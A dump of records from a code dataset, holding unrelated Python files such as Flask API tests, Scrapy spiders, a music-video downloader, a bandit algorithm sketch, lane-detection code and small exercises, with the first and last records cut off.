self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n another_kitty = {'firstname': 'kitty', 'lastname': 'tabby', 'valid': False,'credit_level': 1}\n data = json.dumps(another_kitty)\n resp = self.app.put('/customers/2', data=data, content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_update_customer_with_no_firstname(self):\n \"\"\" Update a Customer with no firstname \"\"\"\n new_customer = {'lastname': 'dog'}\n data = json.dumps(new_customer)\n resp = self.app.put('/customers/2', data=data, content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_update_customer_not_found(self):\n \"\"\" Update a Customer that can't be found \"\"\"\n new_kitty = {\"firstname\": \"timothy\", \"lastname\": \"mouse\"}\n data = json.dumps(new_kitty)\n resp = self.app.put('/customers/0', data=data, content_type='application/json')\n self.assertEquals(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_delete_customer(self):\n \"\"\" Delete a Customer that exists \"\"\"\n # save the current number of customers for later comparrison\n customer_count = self.get_customer_count()\n # delete a customer\n resp = self.app.delete('/customers/2', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(len(resp.data), 0)\n new_count = self.get_customer_count()\n self.assertEqual(new_count, customer_count - 1)\n\n def test_create_customer_with_no_firstname(self):\n \"\"\" Create a Customer with the name missing \"\"\"\n new_customer = {'lastname': 'dog'}\n data = json.dumps(new_customer)\n resp = self.app.post('/customers', data=data, content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_get_nonexisting_customer(self):\n \"\"\" Get a Customer that doesn't exist \"\"\"\n resp = self.app.get('/customers/5')\n self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_query_customer_list_by_lastname(self):\n \"\"\" Query Customers by Last Name \"\"\"\n resp = self.app.get('/customers?lastname=dog', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertTrue(len(resp.data) > 0)\n self.assertTrue('fido' in resp.data)\n self.assertFalse('Dada' in resp.data)\n data = json.loads(resp.data)\n query_item = data[0]\n self.assertEqual(query_item['lastname'], 'dog')\n\n def test_query_customer_list_by_firstname(self):\n \"\"\" Query Customers by Fisrt Name \"\"\"\n resp = self.app.get('/customers?firstname=fido', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertTrue(len(resp.data) > 0)\n self.assertTrue('fido' in resp.data)\n self.assertFalse('Miamia' in resp.data)\n data = json.loads(resp.data)\n query_item = data[0]\n self.assertEqual(query_item['firstname'], 'fido')\n server.Customer.remove_all()\n resp = self.app.get('/customers?firstname=fido', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_query_customer_list_by_unsupported_field(self):\n \"\"\" Query Customers by None Parameter\"\"\"\n resp = self.app.get('/customers?gender=male', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_query_no_customer(self):\n \"\"\" Query used when no custome is avaliable \"\"\"\n server.Customer.remove_all()\n resp = self.app.get('/customers?lastname=dog', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_method_not_allowed(self):\n \"\"\" Call a Method thats not Allowed \"\"\"\n resp = self.app.post('/customers/0')\n self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n\n @patch('app.server.Customer.find_by_kargs')\n def test_mock_search_data_internal_error(self, customer_find_mock):\n \"\"\" Mocking the Server Internal Error \"\"\"\n customer_find_mock.side_effect = OSError()\n resp = self.app.get('/customers?firstname=fido', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n def test_415_unsupported_media_type(self):\n \"\"\" Test the media type checking handler \"\"\"\n new_kitty = {'firstname': 'kitty', 'lastname': 'tabby'}\n data = json.dumps(new_kitty)\n resp = self.app.put('/customers/2', data= data, content_type='string')\n self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)\n\n def test_upgrade_credit_of_a_Customer(self):\n \"\"\" Upgrade the credit of a customer\"\"\"\n resp = self.app.put('/customers/2/upgrade-credit', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n new_json = json.loads(resp.data)\n self.assertEqual(new_json['credit_level'], 1)\n self.assertEqual(new_json['valid'], True)\n\n def test_upgrade_credit_of_a_Customer_not_avaliable(self):\n \"\"\" Upgrade the credit of a customer not avaliable\"\"\"\n resp = self.app.put('/customers/4/upgrade-credit', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_downgrade_credit_of_a_Customer(self):\n \"\"\" Downgrade the credit of a customer\"\"\"\n resp = self.app.put('/customers/2/downgrade-credit', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n new_json = json.loads(resp.data)\n self.assertEqual(new_json['credit_level'], -1)\n self.assertEqual(new_json['valid'], False)\n\n def test_downgrade_credit_of_a_Customer_not_avaliable(self):\n \"\"\" Upgrade the credit of a customer not avaliable\"\"\"\n resp = self.app.put('/customers/4/downgrade-credit', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_the_valid_status_turn_by_credit(self):\n \"\"\" Test the turn of valid when changing the credit_level \"\"\"\n resp = self.app.put('/customers/2/upgrade-credit', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n new_json = json.loads(resp.data)\n self.assertEqual(new_json['credit_level'], 1)\n self.assertEqual(new_json['valid'], True)\n resp = self.app.put('/customers/2/downgrade-credit', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n new_json = json.loads(resp.data)\n self.assertEqual(new_json['credit_level'], 0)\n self.assertEqual(new_json['valid'], True)\n resp = self.app.put('/customers/2/downgrade-credit', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n new_json = json.loads(resp.data)\n self.assertEqual(new_json['credit_level'], -1)\n self.assertEqual(new_json['valid'], False)\n resp = self.app.put('/customers/2/upgrade-credit', content_type='application/json')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n new_json = json.loads(resp.data)\n self.assertEqual(new_json['credit_level'], 0)\n self.assertEqual(new_json['valid'], True)\n\n def test_health_check(self):\n \"\"\" Test the healthcheck url\"\"\"\n resp = self.app.get('/healthcheck')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n new_json = json.loads(resp.data)\n self.assertEqual(new_json['message'], 'Healthy')\n######################################################################\n# Utility functions\n######################################################################\n\n def get_customer_count(self):\n \"\"\" save the current number of customers \"\"\"\n resp = self.app.get('/customers')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n data = json.loads(resp.data)\n return len(data)\n\n\n######################################################################\n# M A I N\n######################################################################\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":12936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"192880671","text":"# *_*coding:utf-8 *_*\n# 浙江2019年选考科目范围\n#按地区_每个地区单独输入网址\nimport scrapy\n# import logging\n# from copy import deepcopy\n\n\n# logger = logging.getLogger(__name__)\n\nclass SubjectSpider(scrapy.Spider):\n name = 'zj2019' #爬虫的名字\n allowed_domains = ['zjzs.net'] # 设置爬取的范围\n start_urls = ['http://zt.zjzs.net/xk2019/area_0_0.html'] # 最开始的url请求\n base_url = 'http://zt.zjzs.net/xk2019/'\n def parse(self, response):\n # 遍历地区 直接写出来拼到url\n # area_list = [\n # 'area_0_0.html', 'area_0_1.html', 'area_0_2.html', 'area_0_3.html', 'area_0_4.html',\n # 'area_0_5.html', 'area_0_6.html', 'area_0_7.html', 'area_0_8.html', 'area_0_9.html',\n # 'area_0_10.html','area_0_11.html',\n # 'area_1_0.html', 'area_1_1.html', 'area_1_2.html', 'area_1_3.html', 'area_1_4.html',\n # 'area_1_5.html', 'area_1_6.html', 'area_1_7.html', 'area_1_8.html', 'area_1_9.html',\n # 'area_1_10.html','area_1_11.html',\n # 'area_2_0.html', 'area_2_1.html', 'area_2_2.html', 'area_2_3.html', 'area_2_4.html',\n # 'area_2_5.html', 'area_2_6.html', 'area_2_7.html'\n # ]\n\n area_list = ['area_0_0.html', 'area_0_1.html'] # test 测试两个地区 成功\n for area in area_list:\n area_url = self.base_url + area\n # 获取详情页的url\n yield scrapy.Request(\n area_url,\n callback=self.parse_area\n )\n\n def parse_area(self, response):\n # 获取遍历的列表页\n li_list = response.xpath(\"//div[@class='dis']/table[2]//tr\")[1:] # 过滤表头第一个数据\n for li in li_list:\n item = {}\n # item['Area'] = li.xpath(\"./td[1]/text()\").extract_first()\n item['Rucode'] = li.xpath(\"./td[2]/text()\").extract_first()\n item['SchoolName'] = li.xpath(\"./td[3]/text()\").extract_first()\n # item['href'] = li.xpath(\"./td[4]/a/@href\").extract_first()\n\n detail = li.xpath(\"./td[5]/a/@href\").extract_first() # 10001.html\n detail = self.base_url + detail\n # 获取详情页的url\n yield scrapy.Request(\n detail,\n callback=self.parse_detail,\n meta={\"item\": item} # 使用meta在不同的解析函数中传递数据\n )\n\n def parse_detail(self,response):\n item = response.meta[\"item\"]\n li_trs = response.xpath(\"//div[@class='search']//table/tr\")[1:] # 过滤掉表头信息\n li_tr = li_trs[::2]\n for tr in li_tr:\n professioanl = []\n item['Level'] = tr.xpath(\"./td[1]/text()\").extract_first() # 层次\n item['ProfessionalType'] = tr.xpath(\"./td[2]/text()\").extract_first() # 专业名称\n # dic['ScopeCount'] = int(tr.xpath(\"./td[3]/text()\").extract_first()) # 选考科目数\n item['Scope'] = sorted(tr.xpath(\"./td[4]/text()\").extract_first().split()) # 选考科目范围\n # 新增科目限制状态字段 0为不限 1为限一科 2为限两科 3为限三科\n # 注意:以下代码仅适用于2019浙江\n if '不限' in item['Scope']:\n item['ScopeStatus'] = 0\n else:\n item['ScopeStatus'] = 1\n item['ScopeArea'] = [\n {\n \"Province\" : \"浙江省\",\n \"ScopeTime\" : \"2019\"\n }\n ]\n ContainsProfessional = tr.xpath(\"./td[5]/text()\").extract() # 专业\n if ContainsProfessional:\n item['ProfessionalName'] = ContainsProfessional\n else:\n if '类' in item['ProfessionalType']:\n item['ProfessionalName'] = []\n else:\n professioanl.append(item['ProfessionalType'])\n item['ProfessionalName'] =professioanl\n # logger.warning(item)\n\n\n yield item","sub_path":"myscrapy/spiders/zj2019_Spider.py","file_name":"zj2019_Spider.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"239428681","text":"import numpy as np\nfrom numpy import exp\nfrom numpy.random import choice\nfrom scipy.optimize import linear_sum_assignment as hungarian\n\nfrom Bandit import Bandit\nfrom BanditEvaluator import BanditEvaluator\n\nclass CombinatorialBandits(Bandit):\n\t\"\"\"--------------------------------------------------------------------\n\tNotation (variable names, etc.) is based on Gai Y. et al., \n\t\"Combinatorial Network Optimization With Unknown Variables: Multi-Armed\n\tBandits With Linear Rewards and Individual Observations\"\n\t\n\ttheta: list of mean estimates\n\tm: number of occurences of arms at slates\n\t--------------------------------------------------------------------\"\"\"\n\t\n\tdef __init__(self, item_count, slate_size, rounds):\n\t\tself.item_count = item_count\n\t\tself.slate_size = slate_size\n\t\tself.evaluator = BanditEvaluator(item_count=item_count, eval_method=\"reward\")\n\t\tself.theta = np.zeros(item_count)\n\t\tself.m = np.zeros(item_count)\n\t\tself.regret_log = [0]\n\t\t\n\t\t# Initialize the variables\n\t\tuniform = (1/(item_count-1)) * np.ones(item_count-1)\n\t\tfor p in range(item_count):\n\t\t\tslate_idx = choice((item_count-1), (slate_size-1), p=uniform, replace=False)\n\t\t\tslate = [1 if i in slate_idx else 0 for i in range(item_count-1)]\n\t\t\tslate = np.insert(slate, p, 1)\n\t\t\treward = self.evaluator.evaluate_slate(slate)[0]\n\t\t\tself.theta = [(t*self.m[i]+reward[i])/(self.m[i]+1) if(slate[i]) else t for i,t in enumerate(self.theta)]\n\t\t\tself.m += slate\n\t\tprint(self.m)\n\t\tprint(self.theta)\n\n\tdef run(self):\n\t\tfor n in range(self.horizon):\n\t\t\t# cost_matrix = ?\n\t\t\tslate = np.array(hungarian(cost_matrix)[0])\n\t\t\tslate_eval, optimal_eval = self.evaluator.evaluate_slate(slate)\n\t\t\tself.theta = [(t*self.m[i]+reward[i])/(self.m[i]+1) if(slate[i]) else t for i,t in enumerate(self.theta)]\n\t\t\tself.m += slate\t\n\t\n\tdef calc_regret(self, slate_eval, optimal_eval):\n\t\tself.regret_log.append((sum(optimal_eval) - sum(slate_eval)) + self.regret_log[-1])\n\n","sub_path":"CombinatorialBandits.py","file_name":"CombinatorialBandits.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"277807022","text":"import glob\r\nfrom match.utils import *\r\n\r\ndef findTemplateSeparateVersion(path,file,jsonDir):\r\n\tjsonFiles=glob.glob(jsonDir)\r\n\tminDistance=100000\r\n\tstarPos=jsonDir.find('*')\r\n\tfor jsonFile in jsonFiles:\r\n\t\tCONFIG,HF_CONFIG=initCONFIG(jsonFile) # HF_CONFIG for fun\r\n\t\tlineList=preProcessPdf(file)\r\n\t\tlineList=fixScript(lineList)\r\n\t\tfor key in CONFIG: key=fixSpaceColonString(key)\r\n\t\tconfigString=createStringList(CONFIG)\r\n\t\tsList,aliasDict=createListOfStringLineList(CONFIG,lineList,configString)\r\n\t\t# New keys\r\n\t\tnewKwList=generateListNewKws(file,jsonFile[starPos:-5],CURR_KW,jsonDir)\r\n\t\tfor key in newKwList:\r\n\t\t\tfor tmpKey in aliasDict:\r\n\t\t\t\tfound=0\r\n\t\t\t\tfor element in aliasDict[tmpKey]:\r\n\t\t\t\t\tif element.find(key)!=-1:\r\n\t\t\t\t\t\tnewKwList.remove(key)\r\n\t\t\t\t\t\tfound=1\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tif (found): break\r\n\t\tfor s in sList:\r\n\t\t\tdis=getDamerauDistance(configString,s,aliasDict)\r\n\t\t\tdis+=len(newKwList)*0.5\r\n\r\n\t\t\t# Testing===========================================================================\r\n\t\t\t# print('=========================================================================')\r\n\t\t\t# print('Standard string:',configString)\r\n\t\t\t# print('Target S:',s)\r\n\t\t\t# print('Distance:',dis)\r\n\t\t\t# print('Template:',jsonFile[starPos:-5])\r\n\t\t\t# print('=========================================================================')\r\n\t\t\t# Testing==========================================================================\r\n\t\t\tif (minDistance>dis):\r\n\t\t\t\tminDistance=dis\r\n\t\t\t\tans=jsonFile[starPos:-5]\r\n\t\t\t\ttargetConfigString=configString\r\n\t\t\t\ttargetS=s\r\n\t\t\t\ttargetCONFIG=CONFIG\r\n\t\t\t\ttargetAliasDict=aliasDict\r\n\t\t\t\ttargetNewKwList=newKwList\r\n\r\n\t\t\t\t# Testing===========================================================================\r\n\t\t\t\tprint('=========================================================================')\r\n\t\t\t\tprint('Standard string:',configString)\r\n\t\t\t\tprint('Target S:',s)\r\n\t\t\t\tprint('Distance:',minDistance)\r\n\t\t\t\tprint('Template:',jsonFile[starPos:-5])\r\n\t\t\t\tprint('New keywords:',newKwList)\r\n\t\t\t\tprint('=========================================================================')\r\n\t\t\t\tif (minDistance==0 or minDistance>15): break\r\n\t\t\t\t# Testing==========================================================================\r\n\t\tif (minDistance==0): break\r\n\r\n\t# print(file)\r\n\tif (minDistance>8): return -1\r\n\r\n\treturn ans\r\n\r\n# def main():\r\n# \tpath='matching/random'\r\n# \tjsonDir='template/*json'\r\n# \tpdfFiles=glob.glob('matching/random/*pdf')\r\n# \tfor file in pdfFiles:\r\n# \t\tprint(file[16:],findTemplateSeparateVersion(path,file,jsonDir))\r\n\r\n# if __name__=='__main__': main()\r\n","sub_path":"Source/match/separateMatching.py","file_name":"separateMatching.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"224509671","text":"with open(\"input\") as f:\n\tlines = f.read().splitlines()\n\ncount = 0\nfor line in lines:\n\tfirst, second = [[int(val) for val in span.split(\"-\")] for span in line.split(\",\")]\n\tif first[0] <= second[0] and first[1] >= second[1] or second[0] <= first[0] and second[1] >= first[1]:\n\t\tcount += 1\n\nprint(count)\n","sub_path":"2022/day04/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"292256139","text":"from NLG.NLG.pynlg.realizer import Clause, ImperativeClause, PrepositionalPhrase, NounPhrase\nfrom NLG.NLG.pynlg.lexicon import Word, XMLLexicon, Noun\n\n\n\n\ndef setUp():\n\n\tlex = XMLLexicon() \n\t#the woman kissed the man behind the curtain\n\ts1 = Clause()\n\tnp_woman = s1.add_subject(lex.getWord(\"woman\"))\n\tnp_woman.add_determiner(lex.getWord(\"the\"))\n\tvp_kiss = s1.add_verb(lex.getWord(\"abandon\", \"VERB\"))\n\tnp_the_curtain = NounPhrase(lex.getWord(\"curtain\", \"NOUN\"), determiner=lex.getWord(\"the\"))\n\tpp_the_curtain = PrepositionalPhrase(lex.getWord(\"behind\", \"PREPOSITION\"), [np_the_curtain]) \n\tvp_kiss.add_prepositional_phrase(pp_the_curtain)\n\t\n\tnp_man = vp_kiss.add_object(lex.getWord(\"man\"))\n\tnp_man.add_determiner(lex.getWord(\"the\")) \n\ts1.set_verb_tense(\"past\")\n\tprint(s1.realize())\n\n\n","sub_path":"WebApp/summe_project/summe_app/Summarizer/NLG/Sample.py","file_name":"Sample.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"263839238","text":"import requests\nimport urllib.request\nimport os\nimport urllib.error\nimport socket\nimport re\n\n#from common import clean_title\n\nkeyword = '周杰伦'\ntimeout = 3.0\nsocket.setdefaulttimeout(timeout)\n\nclass YinYueTaiSpider(object):\n def clean_title(self, filename):\n # 将非法字符替换成'-'\n title = re.sub('[\\/:*?\"<>|]', '-', filename)\n return title\n\n def Schedule(self,a, b, c):\n \"\"\"\n a:已经下载的数据块\n b:数据块的大小\n c:远程文件的大小\n \"\"\"\n per = 100.0 * float(a * b) / float(c)\n if per > 100:\n per = 100\n # print(\"已经下载:\", a)\n # print(\"数据块大小:\", b)\n # print(\"程文件大小:\", c)\n print('{:.2f}%'.format(per),end=\" || \")\n\n\n def get_index(self, url):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n json = response.json()\n return json\n return None\n except ConnectionError:\n return None\n\n def get_page_count(self):\n # 获取mv总页数\n get_page_url = 'http://soapi.yinyuetai.com/search/video-search?keyword={0}&pageIndex=1&pageSize=24'\\\n .format(keyword) # keyword是艺人名\n try:\n response = requests.get(get_page_url)\n if response.status_code == 200:\n json = response.json()\n page_count = json.get('pageInfo')['pageCount'] # 获取总页数\n return page_count\n return None\n except ConnectionError:\n return None\n\n def get_mv_info(self, json):\n # 获取mv的id、标题\n if json.get('videos'):\n items = json.get('videos')['data']\n for item in items:\n video_id = item.get('id')\n title = item.get('title')\n yield {\n 'video_id': video_id,\n 'title': title,\n }\n\n def get_mv_source_url(self, video_id):\n # 构造mv真实地址\n mv_source_url = 'http://www.yinyuetai.com/api/info/get-video-urls?flex=true&videoId={}'.format(video_id)\n json_dict = requests.get(mv_source_url).json()\n mv_source_dict = {\n 'SD_MV': json_dict[\"hdVideoUrl\"] if \"hdVideoUrl\" in json_dict else None,\n 'HD_MV': json_dict[\"hcVideoUrl\"] if \"hcVideoUrl\" in json_dict else None,\n 'FHD_MV': json_dict[\"heVideoUrl\"] if \"heVideoUrl\" in json_dict else None,\n }\n\n mv_source_list = []\n\n for key, value in mv_source_dict.items():\n if value is not None:\n mv_source_list.append(value)\n return mv_source_list\n\n def download_mv(self, mv_source_list, title, video_id): # 下载最高品质的视频\n # 创建存放视频的文件夹\n file = '{}/'.format(keyword)\n if not os.path.exists(file):\n os.mkdir(file)\n print('创建文件夹:', file)\n\n # 处理下载过程中的异常\n try:\n # 判断视频文件是否存在,并且给视频文件名做处理,将不合法的字符用'-'替代\n if not os.path.exists(file + self.clean_title(title) + '-' + str(video_id) + '.mp4'):\n print('Start Download MV:' + title + '...:', mv_source_list[-1])\n urllib.request.urlretrieve(url=mv_source_list[-1], filename=file + self.clean_title(title) + '-' + str(video_id) + '.mp4', reporthook=self.Schedule)\n print('MV Download Success:', title)\n else:\n print('MV:{}-已存在'.format(self.clean_title(title)))\n except socket.timeout:\n # 解决下载时间过长甚至出现死循环的情况\n count = 1\n while count <= 2:\n try:\n urllib.request.urlretrieve(url=mv_source_list[-1], filename=file + self.clean_title(title) + '-' + str(video_id) + '.mp4')\n print('MV Download Success:', title)\n break\n except socket.timeout:\n err_info = 'Reloading for %d time' % count if count == 1 else 'Reloading for %d times' % count\n print(err_info)\n count += 1\n if count > 2:\n print(\"Downloading MV Failed!\")\n\n def main(self):\n page_count = self.get_page_count()\n mv_count = 0\n for page in range(1, page_count):\n print('Crawl Page:', page)\n url = 'http://soapi.yinyuetai.com/search/video-search?keyword={0}&pageIndex={1}&pageSize=24'.format(keyword,\n page)\n json = self.get_index(url)\n for item in self.get_mv_info(json):\n mv_count += 1\n video_id = item['video_id']\n title = item['title']\n mv_source_list = self.get_mv_source_url(video_id)\n self.download_mv(mv_source_list, title, video_id)\n print('已下载MV数量:', mv_count)\n\n\nif __name__ == '__main__':\n mv = YinYueTaiSpider()\n mv.main()\n\n","sub_path":"spider_MV_yinYueTai.py","file_name":"spider_MV_yinYueTai.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"381228528","text":"def fun():\n m=int(input(\"Enter the first number:\")) \n n=int(input(\"Enter the second number:\")) \n if(m==n):\n print(\"Numbers are equal\")\n else:\n print(\"Numbers are not equal\") \n if(m+n==5):\n print(\"They adds up to 5\") \n else:\n print(\"They does not adds up to 5\") \n if(m-n==5):\n print(\"Their difference is 5\")\n else:\n print(\"Their difference is not 5\") \nfun()","sub_path":"lab8-5.py","file_name":"lab8-5.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"328821708","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 6 21:14:59 2020\n\n@author: estanislau\n\"\"\"\n\nimport cv2\nimport glob\nimport numpy as np\n\n\n\nnumero_pasta = 2\n\ncaminho_pasta = '/home/estanislau/Projetos/Atena/Frames/frames_video_fxa_'+str(numero_pasta)+'/*.jpg'\n\npt_pista_1, pt_pista_2, pt_pista_3, pt_pista_4 = (70,340), (570,340), (10,410), (620,410)\npt_destino_1, pt_destino_2, pt_destino_3, pt_destino_4 = (150,0), (480,0), (150,420), (480,420)\n\npontos_pista = np.float32([[pt_pista_1], [pt_pista_2], [pt_pista_3], [pt_pista_4]])\npontos_destino = np.float32([[pt_destino_1], [pt_destino_2], [pt_destino_3], [pt_destino_4]])\n\n\ndef perspectiva_pista(img):\n '''\n\tcv2.line(img, pt_pista_1, pt_pista_2, (0,0,255), 4)\n\tcv2.line(img, pt_pista_1, pt_pista_3, (0,0,255), 4)\n\tcv2.line(img, pt_pista_2, pt_pista_4, (0,0,255), 4)\n\tcv2.line(img, pt_pista_3, pt_pista_4, (0,0,255), 4)\n\n\tcv2.line(img, pt_destino_1, pt_destino_2, (0,255,0), 4)\n\tcv2.line(img, pt_destino_1, pt_destino_3, (0,255,0), 4)\n\tcv2.line(img, pt_destino_2, pt_destino_4, (0,255,0), 4)\n\tcv2.line(img, pt_destino_3, pt_destino_4, (0,255,0), 4)\n '''\n matriz = cv2.getPerspectiveTransform(pontos_pista, pontos_destino)\n img = cv2.warpPerspective(img, matriz, (680, 420)) \n return img\n\n\n\ndef filtros_faixas(img):\n\timg_cinza = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\timg_blur = cv2.GaussianBlur(img_cinza,(5,5),0)\n\t\n\t# Binariza a imagem, definindo regiões pretas e brancas. Para visualizar a imagem binarizada comentar linhas abaixo\n\timg_tresh = cv2.inRange(img_blur, 240, 255) \n\n\treturn img_tresh\n\n\n\ndef detecta_faixas(img):\n\t# Color thresholding\n\tret,thresh = cv2.threshold(img,145,250,cv2.THRESH_BINARY_INV)\n\t\n\t# Find the contours of the frame\n\tcontours, hierarchy = cv2.findContours(thresh.copy(), 1, cv2.CHAIN_APPROX_NONE)\n\t\n\tif len(contours) > 0:\n\t\tc = max(contours, key=cv2.contourArea)\n\t\t\n\t\tM = cv2.moments(c)\n\n\t\tcx = int(M['m10']/M['m00'])\n\n\t\tcy = int(M['m01']/M['m00'])\n\n\t\tcv2.line(img,(cx,0),(cx,420),(255,0,0),1)\n\n\t\tcv2.line(img,(0,cy),(680,cy),(255,0,0),1)\n\n\t\tcv2.drawContours(img, contours, -1, (0,255,0), 1)\n\n\t\treturn img, cx\n\ncont_imagem = 1000\n\nquantidade_imagens = len((glob.glob(caminho_pasta)))\n\ntry: \n \n for i in sorted(glob.glob(caminho_pasta)): \n imagem = cv2.imread(i)\n \n quantidade_imagens -= 1\n \n # Imagens da perspectiva da pista sem filtros aplicados\n imagem_pista = perspectiva_pista(imagem)\n \n # Imagem da perspectiva da pista pista com aplicação dos filtros \n imagem_pista_filtrada = filtros_faixas(imagem_pista)\n \n # Imagem da faixa da esquerda\n imagem_faixa_esq = imagem_pista_filtrada[0:420, 100:360]\n imagem_faixa_esq, cx_esq = detecta_faixas(imagem_faixa_esq.copy())\n \n # Imagem da faixa da direta\n imagem_faixa_dir = imagem_pista_filtrada[0:420, 300:560] \n imagem_faixa_dir, cx_dir = detecta_faixas(imagem_faixa_dir.copy())\n \n correcao_esq, correcao_dir = False, False\n \n if cx_esq >= 59 and cx_esq <= 105:\n correcao_esq = True\n elif cx_dir >= 154 and cx_dir <= 198:\n correcao_dir = True\n \n print(\"Corrigir_MT_Esq: {0} | Corrigir_MT_Dir: {1} | Frame: {2}\\n\".format(correcao_esq, correcao_dir, cont_imagem))\n \n \n cv2.imshow(\"Perspectiva Pista Filtrada\", imagem_pista_filtrada)\n cv2.imshow(\"Faixa Esquerda\", imagem_faixa_esq)\n cv2.imshow(\"Faixa Direita\", imagem_faixa_dir)\n cv2.waitKey(0)\n \n if quantidade_imagens == 0:\n print(\"Todas as imagens analisadas com sucesso!\")\n cv2.destroyAllWindows()\n break\n \n if cv2.waitKey(1) & 0xFF == 27:\n cv2.destroyAllWindows()\t\n \n cont_imagem += 1\n \n \nexcept KeyboardInterrupt:\n cv2.destroyAllWindows()\n print('Encerrar execução...') \n \nfinally:\n cv2.destroyAllWindows()\n","sub_path":"Experimentos/Faixas/avaliacao_frames.py","file_name":"avaliacao_frames.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"424897502","text":"import random\n\nn = int(input(\"list length = \"))\na = int(input(\"min = \"))\nb = int(input(\"max = \"))\narr = []\nsum = 0\n\nfor i in range(n):\n arr.append(random.randint(a, b))\n\nprint(\"X = \"+str(arr))\n\nk = int(input(\"k = \"))\n\nfor i in range(1, len(arr)-1):\n if (arr[i-1] + arr[i+1]) < k:\n sum += arr[i]\n\nprint(sum)\n","sub_path":"hometask_8/+bonus/333.py","file_name":"333.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"303602231","text":"import sys\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef ss_composition(ss_file):\n f = open(ss_file, \"r\") \n h_counter = 0\n e_counter = 0\n coil_counter = 0\n total_counter = 0\n for line in f:\n for letter in line:\n if letter == \"H\":\n h_counter += 1 \n total_counter += 1\n elif letter == \"E\":\n e_counter += 1\n total_counter += 1\n elif letter == \"-\":\n coil_counter += 1\n total_counter += 1\n\n a = open(\"ss_total_count.txt\", \"w+\")\n\n h_percent = \"{0:.2f}\".format((h_counter/total_counter) * 100)\n e_percent = \"{0:.2f}\".format((e_counter/total_counter) * 100)\n c_percent = \"{0:.2f}\".format((coil_counter/total_counter) * 100)\n\n\n a.write(\"H=\" + str(h_counter) + \"=\" + str(h_percent) + \"%\\n\" + \"E=\" + str(e_counter) + \"=\" + str(e_percent) + \"%\\n\" + \"-=\" + str(coil_counter) + \"=\" + str(c_percent) + \"%\\n\" + \"TOT=\" + str(total_counter))\n\n\n df = pd.DataFrame([h_counter, e_counter, coil_counter], index = ['Helix ' + h_percent + \"%\" , 'Strand ' + e_percent + \"%\" , 'Coil ' + c_percent + \"%\" ], columns=[''])\n df.plot(kind='pie', subplots=True, figsize=(8, 8), legend = None)\n plt.savefig('ss_composition.png')\n return()\n\n\nif __name__ == \"__main__\":\n ss_file = sys.argv[1]\n ss_composition(ss_file)\n","sub_path":"scripts/statistics/ss_composition.py","file_name":"ss_composition.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"296669702","text":"# Authon :wang\nimport requests\nimport unittest\nimport time\nfrom SamplesInterface.common.logger import Log\nfrom SamplesInterface.config.getCookies import CookiesUtil\n\ncookies = CookiesUtil()\nCookie = CookiesUtil.cookies\nqa_ip = 